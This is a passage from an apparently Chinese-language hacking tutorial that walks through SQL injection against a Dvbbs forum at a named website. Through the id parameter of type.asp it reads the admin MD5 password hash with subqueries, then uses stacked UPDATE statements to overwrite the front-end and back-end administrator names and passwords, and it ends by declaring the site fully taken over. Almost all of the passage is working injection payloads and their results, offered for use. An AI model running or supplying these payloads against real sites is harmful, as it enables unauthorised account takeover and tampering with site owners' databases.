好,得到他的密码:
程序代码:
[ 复制代码到剪贴板 ]
http://www.loveyou.com/type.asp?id=(select userpassword from user where username=''''admin'''')-- 返回,admin的前台密码为:e7cc01be0e33a273 同样是MD5的。 现在利用COOKIE欺骗可以登陆它的前台管理了。但是还有别的办法吗?别忘了现在我们可是对它的数据库拥有生杀大权哦。聪明的你可能想到了,对 ,就是,update。 我们来提交: http://www.loveyou.com/type.asp?id=6;update user set userpa ... 39; where username=''''admin'''';-- 正常返回信息,应该成功执行了,查看一下: http://www.loveyou.com/type.asp?id=(select userpassword&n ... here username=''''admin'''')-- 返回值为: 49ba59abbe56e057 更改密码成功,说明一下,这个16位MD5是预先算好的。你要知道它的明文密码。 那么同样的,我们更改一下后台的管理密码.先把后台用户改成和前台用户一样的,提交: http://www.loveyou.com/type.asp?id=6;update admin set ... sp;where username=''''01city''''--
查看一下:
程序代码:
[ 复制代码到剪贴板 ]
http://www.loveyou.com/type.asp?id=(select username from admin)-- 更改成功,后台管理员现在已变成:admin 接下来更改密码,提交: http://www.loveyou.com/type.asp?id=6;update admin set passw ... ; where username=''''admin''''--
查看一下:
程序代码:
[ 复制代码到剪贴板 ]
http://www.loveyou.com/type.asp?id=(select password from admin)-- 更改成功,后台管理员密码已经变成:49ba59abbe56e057
到这里为止,动网已彻底沦陷。你可以用admin登陆前台然后再用相同的密码进后台管理了。